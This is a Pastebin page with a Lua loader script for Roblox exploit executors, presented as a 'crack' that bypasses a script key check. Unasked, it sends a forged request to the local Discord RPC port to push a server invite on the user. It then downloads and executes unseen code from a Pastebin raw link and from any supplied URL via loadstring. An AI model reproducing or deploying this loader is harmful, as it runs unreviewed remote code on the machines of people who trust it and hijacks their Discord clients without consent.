Advertisement
NukeVsCity

Untitled

Aug 30th, 2023 (edited)
794
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 1.21 KB | None | 0 0
  1. repeat wait() until game:IsLoaded()
  2. local HttpService = game:GetService("HttpService")
  3. local StarterGui = game:GetService("StarterGui")
  4. local Request_ = (syn and syn.request) or (http and http.request) or http_request
  5. local Crack = {}
  6. print([[Collorem :D]])
  7.  
  8. function Crack:load(Raw)
  9.  
  10.     Request_({
  11.         Url = 'http://127.0.0.1:6463/rpc?v=1',
  12.         Method = 'POST',
  13.         Headers = {
  14.             ['Content-Type'] = 'application/json',
  15.             Origin = 'https://discord.com'
  16.         },
  17.         Body = HttpService:JSONEncode({
  18.             cmd = 'INVITE_BROWSER',
  19.             nonce = HttpService:GenerateGUID(false),
  20.             args = {code = "cZfYYb9Kvm"}
  21.         })
  22.     })
  23.  
  24.     local Sucess, Response = pcall(function()
  25.             print([[Loading Crack]])
  26.             loadstring(game:HttpGet("https://pastebin.com/raw/jXHjdWcT"))()
  27.     end)
  28.     if Sucess then loadstring(game:HttpGet(Raw))()
  29.         print([[Successfully Loaded Crack, Press "Check Key" to load script.]])
  30.         StarterGui:SetCore("SendNotification", {
  31.             Title = [[Successfully Loaded Crack]];
  32.             Text = [[Press "Check Key" to load script.]];
  33.             Duration = 10;
  34.         })
  35.     end
  36. end
  37.  
  38. return Crack
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement